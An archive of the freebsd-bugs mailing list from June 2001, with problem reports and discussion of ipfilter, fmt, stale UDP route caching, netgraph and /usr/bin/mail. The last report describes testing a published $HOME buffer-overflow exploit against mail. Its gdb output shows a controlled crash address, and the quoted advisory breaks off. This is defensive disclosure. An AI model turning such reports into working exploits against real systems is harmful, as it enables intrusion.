3C55837B405; Wed, 6 Jun 2001 03:18:46 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56AIk491527; Wed, 6 Jun 2001 03:18:46 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 03:18:46 -0700 (PDT) From: Message-Id: <200106061018.f56AIk491527@freefall.freebsd.org> To: gjm11@dpmms.cam.ac.uk, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/5901: new version of `fmt' Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: new version of `fmt' State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Jun 6 03:17:58 PDT 2001 State-Changed-Why: Committed, thanks! http://www.FreeBSD.org/cgi/query-pr.cgi?pr=5901 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 3:20: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 236C337B407 for ; Wed, 6 Jun 2001 03:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56AK1g91672; Wed, 6 Jun 2001 03:20:01 -0700 (PDT) (envelope-from gnats) Received: from infres.enst.fr (infres-192.enst.fr [137.194.192.1]) by hub.freebsd.org (Postfix) with ESMTP id AAD7437B403 for ; Wed, 6 Jun 2001 03:11:24 -0700 (PDT) (envelope-from quinot@inf.enst.fr) Received: from shalmaneser.enst.fr (shalmaneser.enst.fr [137.194.160.128]) by infres.enst.fr (Postfix) with ESMTP id 5048A18C1 for ; Wed, 6 Jun 2001 12:11:18 +0200 (MET DST) Received: by shalmaneser.enst.fr (Postfix, from userid 11117) id 4F5C21134A; Wed, 6 Jun 2001 12:11:14 +0200 (CEST) Message-Id: <20010606101114.4F5C21134A@shalmaneser.enst.fr> Date: Wed, 6 Jun 2001 12:11:14 +0200 (CEST) From: quinot@inf.enst.fr Reply-To: quinot@inf.enst.fr To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: kern/27905: ipf unable to insert rule of 'log' is used Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27905 >Category: kern >Synopsis: ipf unable to insert rule of 'log' is used >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 06 03:20:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Thomas Quinot >Release: FreeBSD 5.0-CURRENT i386 >Organization: >Environment: System: 4.3-RELEASE FreeBSD 4.3-RELEASE #2: Wed Apr 25 12:49:18 CEST 2001 >Description: With the following ipfilter config file: ---------- cut here # Group 21 is outbound ACL for interface xl0 block out log quick on xl0 from any to any head 21 # Default is deny #block out from any to any group 21 # This line works block out log from any to any group 21 # With that line (same + 'log') ipf gets EEXIST when inserting the rule. # Branch to group 211 for three hosts that require specific processing skip 3 out from any to 10.10.0.142 group 21 skip 2 out from any to 10.10.0.140 group 21 skip 1 out from any to 10.10.0.154 group 21 skip 1 out from any to any group 21 block out log from any to any head 211 group 21 ---------- cut here when running 'ipf -I -Fa -f the_config_file', the following error is produced: 20:ioctl(add/insert rule): File exists If the 'log' keyword is removed from line 20, then no error is produced. This problem is also reproduced with -CURRENT as of May 30th. >How-To-Repeat: Cut/paste the ACL above to a file. Run ipf -I -Fa -f the_file Swap commenting-out of 'This line works/That line doesn't' Run ipf -I -Fa -f the_file again. >Fix: None known so far. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 3:22:30 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 01F6537B422; Wed, 6 Jun 2001 03:22:26 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56AMKA91948; Wed, 6 Jun 2001 03:22:20 -0700 (PDT) (envelope-from ru) Date: Wed, 6 Jun 2001 03:22:20 -0700 (PDT) From: Message-Id: <200106061022.f56AMKA91948@freefall.freebsd.org> To: grg@isabase.philol.msu.ru, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/12242: segmentation fault running /usr/bin/fmt Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: segmentation fault running /usr/bin/fmt State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Jun 6 03:18:58 PDT 2001 State-Changed-Why: This bug is not present in the new version of the fmt(1) utility. This utility will be MFCed into RELENG_4 branch within two weeks. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=12242 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 3:30:15 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A968137B409 for ; Wed, 6 Jun 2001 03:30:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56AU7J92591; Wed, 6 Jun 2001 03:30:07 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 03:30:07 -0700 (PDT) Message-Id: <200106061030.f56AU7J92591@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: kern/27890: FreeBSD not always seems to take the best route Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27890; it has been noted by GNATS. From: Andre Albsmeier To: Ruslan Ermilov Cc: Andre Albsmeier , bug-followup@FreeBSD.org Subject: Re: kern/27890: FreeBSD not always seems to take the best route Date: Wed, 6 Jun 2001 12:29:04 +0200 Thanks for helping... On Wed, 06-Jun-2001 at 11:24:19 +0300, Ruslan Ermilov wrote: > > ... > > I can't reproduce this problem on my 4.3-STABLE box. > > Yes, the UDP socket has the reference to the protocol-cloned > route to the destination host S through the router 1 initially, > and UDP packets go through that router. > > In my tests, router 1 (192.168.1.1) was the host *not* configured > to act as the router, so all "foreign" packets sent to it got OK, I have blocked packets coming from C on router 1. So I think I got the same config as you. > silently ignored. I used the ports/net/netcat utility to connect > to the UDP `echo' port of the destination S (192.168.2.1): > > Fig.1: Initial state, before UDP socket is open. > > : # netstat -arn > : Destination Gateway Flags Refs Use Netif Expire > : default 192.168.1.1 UGSc 0 2 rl0 > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > : 192.168.1 link#1 UC 3 0 rl0 => > > > Fig.2: We connect(2) UDP socket to the "echo" port on S (192.168.2.1). > > : # nc -u 192.168.2.1 echo > : ping1 > : ping2 > : ping3 > [...] > > As you can see, we receive no echos back. OK, same here. > Fig.3: Routing table after UDP socket is open. > > : # netstat -arn > : Destination Gateway Flags Refs Use Netif Expire > : default 192.168.1.1 UGSc 1 2 rl0 > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > : 192.168.1 link#1 UC 4 0 rl0 => > : 192.168.2.1 192.168.1.1 UGHW 1 14 rl0 > > The route to S (192.168.2.1) was cloned (W) from the `default' route. > refcnt=1 on the 192.168.2.1 route indicates that the UDP socket holds > a reference to this route. Same here: 192.168.2.1 192.168.1.1 UGHW 1 425 fxp0 > Fig.4: I manually add the route to the 192.168.2 network. > > : # route add -net 192.168.2 192.168.1.2 > : add net 192.168.2: gateway 192.168.1.2 OK, I don;t add it manually but wait until routed messages from 192.168.1.2 brings it back. > > Fig.5: Routing table after the route to the 192.168.2 network was added. > > : # netstat -arn > : Destination Gateway Flags Refs Use Netif Expire > : default 192.168.1.1 UGSc 1 2 rl0 > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > : 192.168.1 link#1 UC 4 0 rl0 => > : 192.168.2 192.168.1.2 UGSc 0 0 rl0 Yup, same here > As you can see, the route to the 192.168.2.1 host is deleted from the routing > table. It actually doesn't get freed completely, as it had non-zero reference > count (UDP socket still holds on it), but instead it gets marked as DOWN, and > will be freed and reallocated in ip_output() on the next use. > > Fig.6: We continue to send UDP datagrams. > > : # nc -u 192.168.2.1 echo (continued) > : ping4 > : ping4 > : ping5 > : ping5 > : ping6 > : ping6 > > As you can see, this time we get the echos back. Yes, same here :-( > Fig.7: Routing table after we sent more UDP datagrams. > > : # netstat -arn -finet > : Destination Gateway Flags Refs Use Netif Expire > : default 192.168.1.1 UGSc 0 2 rl0 > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > : 192.168.1 link#1 UC 4 0 rl0 => > : 192.168.2 192.168.1.2 UGSc 1 3 rl0 > > The refcount on 192.168.2 route has grown to 1, indicating that the > UDP socket now holds on this route. The `Use' count of 3 corresponds > to our three UDP datagrams (ping4, ping5, and ping6). > > Could you please repeat these steps in your environment, and try to > detect where it behaved differently in your case. It doesn't behave differently, that's interesting. May I ask you to try it using syslogd? - Let host C log to host S (with the route installed). - Watch C's messages appear on S. - Delete C's route to S (via router 2) - Let host C log again (run tcpdump on router 1 to see the packets come in) - Install the route to S (via router 2) again on C - Log more stuff. If you don't see the packets go into router 1 anymore I am really lost... Thanks, -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 4:20: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B841237B408 for ; Wed, 6 Jun 2001 04:20:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56BK5t04713; Wed, 6 Jun 2001 04:20:05 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 04:20:05 -0700 (PDT) Message-Id: <200106061120.f56BK5t04713@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: kern/27890: FreeBSD not always seems to take the best route Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27890; it has been noted by GNATS. From: Andre Albsmeier To: David Malone Cc: Andre Albsmeier , FreeBSD-gnats-submit@freebsd.org Subject: Re: kern/27890: FreeBSD not always seems to take the best route Date: Wed, 6 Jun 2001 13:19:26 +0200 On Tue, 05-Jun-2001 at 20:05:57 +0100, David Malone wrote: > On Tue, Jun 05, 2001 at 06:30:14PM +0200, Andre Albsmeier wrote: > > The problem is that each time when syslogd on C wants to send > > a packet to S, the kernel still uses 1 as router even though > > it should send them through 2. After HUPing or restarting > > syslogd on C (which means that the UDP socket is closed and > > opened again) things are back to normal. > > This sounds like it is to do with the caching of recently used > routes. Does the effect go away if you leave it for a while? I had it running for 3 hours now but it didn't change. As soon as I HUP'ed syslogd it worked. > Adjusting some of the following sysctls might change how long > you have to wait: > > net.inet.ip.rtexpire > net.inet.ip.rtminexpire > net.inet.ip.rtmaxcache > > (Some of the networking people could definitely provide more > details.) Ruslan Ermilov sent me a mail and asked me to reproduce the behaviour with netcat. This worked properly so maybe it is really some issue with syslogd. I will try to isolate the problem as soon as Ruslan can reproduce it with syslogd. Thanks, -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 5:10: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8C1F837B405 for ; Wed, 6 Jun 2001 05:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56CA1611926; Wed, 6 Jun 2001 05:10:01 -0700 (PDT) (envelope-from gnats) Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14]) by hub.freebsd.org (Postfix) with ESMTP id B025C37B403 for ; Wed, 6 Jun 2001 05:01:36 -0700 (PDT) (envelope-from brandt@fokus.gmd.de) Received: from fokus.gmd.de (beagle [193.175.132.100]) by mailhub.fokus.gmd.de (8.8.8/8.8.8) with ESMTP id OAA06529 for ; Wed, 6 Jun 2001 14:01:35 +0200 (MET DST) Received: (from root@localhost) by fokus.gmd.de (8.11.3/8.11.0) id f56C1Zx67238; Wed, 6 Jun 2001 14:01:35 +0200 (CEST) (envelope-from hbb) Message-Id: <200106061201.f56C1Zx67238@fokus.gmd.de> Date: Wed, 6 Jun 2001 14:01:35 +0200 (CEST) From: brandt@fokus.gmd.de Reply-To: brandt@fokus.gmd.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: kern/27906: NG_SEND_MSG_HOOK fails to set the return address for the response Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27906 >Category: kern >Synopsis: NG_SEND_MSG_HOOK fails to set the return address for the response >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 06 05:10:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Harti Brandt >Release: FreeBSD 5.0-CURRENT i386 >Organization: GMD Fokus, Berlin, Germany >Environment: System: FreeBSD beagle.fokus.gmd.de 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Wed Apr 4 11:23:55 CEST 2001 hbb@beagle.fokus.gmd.de:/opt/obj/usr/src/sys/BEAGLE i386 >Description: NG_SEND_MSG_HOOK, as defined in netgraph.h has a 5th parameter 'retaddr' which specifies the node ID of the node, which should receive a response to the message. This parameter is passed to ng_address_hook() which, at present, ignores it. This leads to the response beeing dropped by the netgraph base code. >How-To-Repeat: Create a netgraph node, which sends a message to another node via a hook by using NG_SEND_MSG_HOOK. Observe, that the response from the receiving node is lost. >Fix: Patch to ng_base.c: Index: ng_base.c =================================================================== RCS file: /usr/ncvs/src/sys/netgraph/ng_base.c,v retrieving revision 1.54 diff -r1.54 ng_base.c 3490a3491 > SET_RETADDR(item, here, retaddr); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 5:40: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0830E37B401 for ; Wed, 6 Jun 2001 05:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Ce1J14186; Wed, 6 Jun 2001 05:40:01 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 05:40:01 -0700 (PDT) Message-Id: <200106061240.f56Ce1J14186@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: kern/27890: FreeBSD not always seems to take the best route Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/27890; it has been noted by GNATS. From: Ruslan Ermilov To: Andre Albsmeier Cc: bug-followup@FreeBSD.org Subject: Re: kern/27890: FreeBSD not always seems to take the best route Date: Wed, 6 Jun 2001 15:32:05 +0300 On Wed, Jun 06, 2001 at 12:29:04PM +0200, Andre Albsmeier wrote: > Thanks for helping... > > On Wed, 06-Jun-2001 at 11:24:19 +0300, Ruslan Ermilov wrote: > > > > ... > > > > I can't reproduce this problem on my 4.3-STABLE box. > > > > Yes, the UDP socket has the reference to the protocol-cloned > > route to the destination host S through the router 1 initially, > > and UDP packets go through that router. > > > > In my tests, router 1 (192.168.1.1) was the host *not* configured > > to act as the router, so all "foreign" packets sent to it got > > OK, I have blocked packets coming from C on router 1. So > I think I got the same config as you. > > > > silently ignored. I used the ports/net/netcat utility to connect > > to the UDP `echo' port of the destination S (192.168.2.1): > > > > Fig.1: Initial state, before UDP socket is open. > > > > : # netstat -arn > > : Destination Gateway Flags Refs Use Netif Expire > > : default 192.168.1.1 UGSc 0 2 rl0 > > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > > : 192.168.1 link#1 UC 3 0 rl0 => > > > > > > Fig.2: We connect(2) UDP socket to the "echo" port on S (192.168.2.1). > > > > : # nc -u 192.168.2.1 echo > > : ping1 > > : ping2 > > : ping3 > > [...] > > > > As you can see, we receive no echos back. > > OK, same here. > > > > Fig.3: Routing table after UDP socket is open. > > > > : # netstat -arn > > : Destination Gateway Flags Refs Use Netif Expire > > : default 192.168.1.1 UGSc 1 2 rl0 > > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > > : 192.168.1 link#1 UC 4 0 rl0 => > > : 192.168.2.1 192.168.1.1 UGHW 1 14 rl0 > > > > The route to S (192.168.2.1) was cloned (W) from the `default' route. > > refcnt=1 on the 192.168.2.1 route indicates that the UDP socket holds > > a reference to this route. > > Same here: > > 192.168.2.1 192.168.1.1 UGHW 1 425 fxp0 > > > > Fig.4: I manually add the route to the 192.168.2 network. > > > > : # route add -net 192.168.2 192.168.1.2 > > : add net 192.168.2: gateway 192.168.1.2 > > OK, I don;t add it manually but wait until routed messages from > 192.168.1.2 brings it back. > > > > > > Fig.5: Routing table after the route to the 192.168.2 network was added. > > > > : # netstat -arn > > : Destination Gateway Flags Refs Use Netif Expire > > : default 192.168.1.1 UGSc 1 2 rl0 > > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > > : 192.168.1 link#1 UC 4 0 rl0 => > > : 192.168.2 192.168.1.2 UGSc 0 0 rl0 > > Yup, same here > > > > As you can see, the route to the 192.168.2.1 host is deleted from the routing > > table. It actually doesn't get freed completely, as it had non-zero reference > > count (UDP socket still holds on it), but instead it gets marked as DOWN, and > > will be freed and reallocated in ip_output() on the next use. > > > > Fig.6: We continue to send UDP datagrams. > > > > : # nc -u 192.168.2.1 echo (continued) > > : ping4 > > : ping4 > > : ping5 > > : ping5 > > : ping6 > > : ping6 > > > > As you can see, this time we get the echos back. > > Yes, same here :-( > > > > Fig.7: Routing table after we sent more UDP datagrams. > > > > : # netstat -arn -finet > > : Destination Gateway Flags Refs Use Netif Expire > > : default 192.168.1.1 UGSc 0 2 rl0 > > : 127.0.0.1 127.0.0.1 UH 1 6 lo0 > > : 192.168.1 link#1 UC 4 0 rl0 => > > : 192.168.2 192.168.1.2 UGSc 1 3 rl0 > > > > The refcount on 192.168.2 route has grown to 1, indicating that the > > UDP socket now holds on this route. The `Use' count of 3 corresponds > > to our three UDP datagrams (ping4, ping5, and ping6). > > > > Could you please repeat these steps in your environment, and try to > > detect where it behaved differently in your case. > > It doesn't behave differently, that's interesting. May I ask you to > try it using syslogd? > > - Let host C log to host S (with the route installed). > - Watch C's messages appear on S. > - Delete C's route to S (via router 2) > - Let host C log again (run tcpdump on router 1 to see the packets come in) > - Install the route to S (via router 2) again on C > - Log more stuff. If you don't see the packets go into router 1 anymore > I am really lost... > Yes, I have reproduced the problem here. My test misses one step. OK, now about what happens here. Initially, there is the route (cloned from the network route) to S (192.168.2.1) through the router 2 (192.168.1.2). UDP socket uses this route initially. When this (and the 192.168.2 network) routes disappear, on the next write (!), ip_output() detects that the S route is DOWN, and "allocates" (caches) another route, which happens to be the "default" route pointing to router 1 (192.168.1.1). Later, when the route to the 192.168.2 network gets installed again, it's not taken into account, as the cached ("default") route is still UP. Unfortunately, there is no easy way to fix this. Checking for the best-match route on every write may be too time consuming. As the workaround, you can delete and re-add your "default" route. This worked for me here. `route delete default' will delete the "default" route from the routing table, but because it has a refcnt>0 will not delete it immediately, but will mark it as DOWN. ip_output() for this UDP socket's write will detect that the cached route is DOWN, will free it, and allocate a new route, which will be the route to the 192.168.2 network through router 2 (192.168.1.2) this time. The actual fix would be to notify protocol (from within the routing code) whenever its routing table is modified. This notification could then be saved in a variable as timestamp, and every PCB-cached route could have a similar timestamp as well, indicating when this "caching" took place. Having that, ip_output() would "invalidate" cached route if it was cached before the last routing table modification was done. I could probably try to implement this, if no one else can come up with a better idea. Cheers, -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 5:53:42 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from gidgate.gid.co.uk (gid.co.uk [194.32.164.225]) by hub.freebsd.org (Postfix) with ESMTP id B03E737B406; Wed, 6 Jun 2001 05:53:38 -0700 (PDT) (envelope-from rb@gid.co.uk) Received: (from rb@localhost) by gidgate.gid.co.uk (8.9.3/8.9.3) id NAA23100; Wed, 6 Jun 2001 13:53:34 +0100 (BST) (envelope-from rb) Message-Id: <4.3.2.7.2.20010606134734.00bab440@gid.co.uk> X-Sender: rbmail@gid.co.uk X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 06 Jun 2001 13:51:39 +0100 To: Ruslan Ermilov , freebsd-bugs@FreeBSD.ORG From: Bob Bishop Subject: Re: kern/27890: FreeBSD not always seems to take the best route In-Reply-To: <200106061240.f56Ce1J14186@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:40 06/06/01 -0700, Ruslan Ermilov wrote: >[heavily pruned] > The actual fix would be to notify protocol (from within the > routing code) whenever its routing table is modified. This > notification could then be saved in a variable as timestamp, > and every PCB-cached route could have a similar timestamp as > well, indicating when this "caching" took place. Having > that, ip_output() would "invalidate" cached route if it was > cached before the last routing table modification was done. Alternatively, just have ip_output expire the cached route after a delay. -- Bob Bishop +44 (0)118 977 4017 rb@gid.co.uk fax +44 (0)118 989 4254 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 6:34: 0 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from gw-nl4.philips.com (gw-nl4.philips.com [212.153.190.6]) by hub.freebsd.org (Postfix) with ESMTP id 51C7037B403 for ; Wed, 6 Jun 2001 06:33:57 -0700 (PDT) (envelope-from hfloor@best.ms.philips.com) Received: from smtpscan-nl2.philips.com (localhost.philips.com [127.0.0.1]) by gw-nl4.philips.com with ESMTP id PAA21808 for ; Wed, 6 Jun 2001 15:33:55 +0200 (MEST) (envelope-from hfloor@best.ms.philips.com) Received: from smtpscan-nl2.philips.com(130.139.36.22) by gw-nl4.philips.com via mwrap (4.0a) id xma021802; Wed, 6 Jun 01 15:33:55 +0200 Received: from smtprelay-nl1.philips.com (localhost [127.0.0.1]) by smtpscan-nl2.philips.com (8.9.3/8.8.5-1.2.2m-19990317) with ESMTP id PAA12796 for ; Wed, 6 Jun 2001 15:33:48 +0200 (MET DST) Received: from nlms1s22.best.ms.philips.com (mailhub.best.ms.philips.com [130.144.100.102]) by smtprelay-nl1.philips.com (8.9.3/8.8.5-1.2.2m-19990317) with ESMTP id PAA15533 for ; Wed, 6 Jun 2001 15:31:44 +0200 (MET DST) Received: from best.ms.philips.com (niw00047.best.ms.philips.com [130.144.88.51]) by nlms1s22.best.ms.philips.com (8.9.1b+Sun/8.9.1) with ESMTP id PAA27482 for ; Wed, 6 Jun 2001 15:28:20 +0200 (MET DST) Message-ID: <3B1E30BF.967EE721@best.ms.philips.com> Date: Wed, 06 Jun 2001 15:31:43 +0200 From: Hans Floor Organization: PMSN X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.org Subject: (no subject) Content-Type: multipart/mixed; boundary="------------A398AC39C8B6CABB485EB906" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------A398AC39C8B6CABB485EB906 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit --------------A398AC39C8B6CABB485EB906 Content-Type: text/x-vcard; charset=us-ascii; name="hfloor.vcf" Content-Transfer-Encoding: 7bit Content-Description: Card for Hans Floor Content-Disposition: attachment; filename="hfloor.vcf" begin:vcard n:Floor;Ing. Hans x-mozilla-html:FALSE org:Prof. Holst Centre for Training and Education, Philips Medical Systems version:2.1 email;internet:hfloor@best.ms.philips.com tel;fax:(0)40-2763951 tel;work:(0)40-2736907 adr;quoted-printable:;;Building QS-214=0D=0AP.O. Box 10000;5680 DA Best;;;The Netherlands x-mozilla-cpt:;0 fn:Ing. Hans Floor end:vcard --------------A398AC39C8B6CABB485EB906-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 6:50: 9 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D95C137B405 for ; Wed, 6 Jun 2001 06:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56Do1B80317; Wed, 6 Jun 2001 06:50:01 -0700 (PDT) (envelope-from gnats) Received: from wumpus.wlcg.com (wumpus.wlcg.com [209.9.101.248]) by hub.freebsd.org (Postfix) with ESMTP id F222837B403 for ; Wed, 6 Jun 2001 06:43:32 -0700 (PDT) (envelope-from rsimmons@wumpus.wlcg.com) Received: (from rsimmons@localhost) by wumpus.wlcg.com (8.11.3/8.11.3) id f56Derj10576; Wed, 6 Jun 2001 09:40:53 -0400 (EDT) (envelope-from rsimmons) Message-Id: <200106061340.f56Derj10576@wumpus.wlcg.com> Date: Wed, 6 Jun 2001 09:40:53 -0400 (EDT) From: Rob Simmons Reply-To: rsimmons@wumpus.wlcg.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27907: /usr/bin/mail dumps core with a Seg Fault Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27907 >Category: bin >Synopsis: /usr/bin/mail dumps core with a Seg Fault >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 06 06:50:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Rob Simmons >Release: FreeBSD 4.3-STABLE i386 >Organization: >Environment: System: FreeBSD wumpus 4.3-STABLE FreeBSD 4.3-STABLE #0: Fri May 11 09:42:50 EDT 2001 root@wumpus:/usr/obj/usr/src/sys/WUMPUS i386 >Description: I was testing the buffer overflow that was reported to bugtraq on June 4th involving /usr/bin/mail on Solaris and the exploit does not gain root access. It does cause /usr/bin/mail to seg fault and dump core. I have gdb output from the core file: bash-2.05$ gdb /usr/bin/mail mail.core GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... (no debugging symbols found)... Core was generated by `mail'. Program terminated with signal 11, Segmentation fault. Reading symbols from /usr/lib/libc.so.4...(no debugging symbols found)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols found)... done. #0 0x41414141 in ?? () (gdb) quit >How-To-Repeat: Here is the advisory. The "Details" section contains one method for getting mail to dump core. The exploit itself does the same. Georgi Guninski security advisory #46, 2001 $HOME buffer overflow in SunOS 5.8 x86 Systems affected: SunOS 5.8 x86 have not tested on other OSes Risk: Medium Date: 4 June 2001 Legal Notice: This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written 